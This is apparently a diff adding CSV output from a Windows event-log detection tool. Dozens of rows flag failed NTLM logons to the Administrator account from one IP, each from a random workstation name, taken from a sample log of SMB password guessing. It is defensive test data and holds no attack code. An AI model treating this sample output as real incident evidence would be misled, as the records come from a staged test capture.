+2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m7uTpMLqPgenJdRb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FQn7NqRzpGtjQdfv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8F8EZLHQtEWkeob1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5joxW81M9vcAfbJw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iMfmQF3xsaV5SQVZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QQe9VL8eeco0SdPW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MnMbxQEuczrnMLKc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3DWOiTIp6JQLq9Vz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E1ORteg467kiFxmD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EoVhHZ2lkyAEx0w9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IMSqYaVVGR5v3bXr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hEEJ05nL0lyatWKL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SgrcS1NqwVJSEv31  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CCNTu1A6c6myngXd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YLx5Hv5GmdvsO9SE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VtS3KUkTVoAWGqbW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7DxfDEwc6ykrmddu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m8yKyocZwOY574pe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JfdmcsxnDHRxJYAA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: euxBOcdse8NjSzTd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dw7RZh5jKuRcM1xw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zIyozsYA1Mn27gl7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vhJopROjHZi6T8aF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QZ6XuZO6fIMg52tV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tvAYEepvDwz93ezW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Er95vLjet49OmSQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OKkMGZ5on5L26cip  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dp5dq3YYmmLxperL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: klkWqfYoNQQHRISX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q0EekPO3q6qRfq3i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gfG1x6sL4Aqlj7TK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: owSUehMmDEhijkfl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J3xBPT5WiuvmPZHe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gIufEPz8FBVd5yKe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Blruxd110NvZjof  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0VsPitzItsjU3Y59  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HEq6vk4nTe3weSOP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lE8kvmcQtCmlsqtT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IXmfjxrGC3liZ2oh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 72JLcUBrhOoXPLzD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sRoFpK2ZvBYy4jGM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9KReiI3k2WIKpxFq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wsfSzPbji6ARhU0k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: axeCxygvJ4zL4Xoq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y64sc51Y7vbiFTIQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o395tRQcfRBTTCSF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K1R4wlYWS4SkM3dF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RsZy0Yjvk720Mu22  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c8RusStjhReKBmS0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eJuPYLTcGaGvErLg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: raCbua01mzU1Djuf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fnt8atAbMtxXivUs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: psokvQJyMn5m5rMh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wTPGqOITsOhpTgIF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xxhGrLzhwNziihc9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UIb1lHuPaC62UlBp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2uvXuLIR9yvmWngF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MI35CCybjNtntfwo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0GTJfOkk0fUC5YCX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jk6PsiAiLPsHGUh1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KeGDMp9My5eLJz55  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BvDQphjvwOCsNQqB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sbJhad4aocvPMYVP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SJl3XqTUxvqiKKaG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a1fAJDfguuoNxWiR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: daAeGcsqoqERsEu6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0iynnwxS8v4C5b3E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2kU7IS4XCvgRpTff  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MBC8AJXBQHrCMrO2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NSGraDQmI4MAq9Ls  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B7u2Pb9y8hB0iYWh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A657rbd6k4AD7M4i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
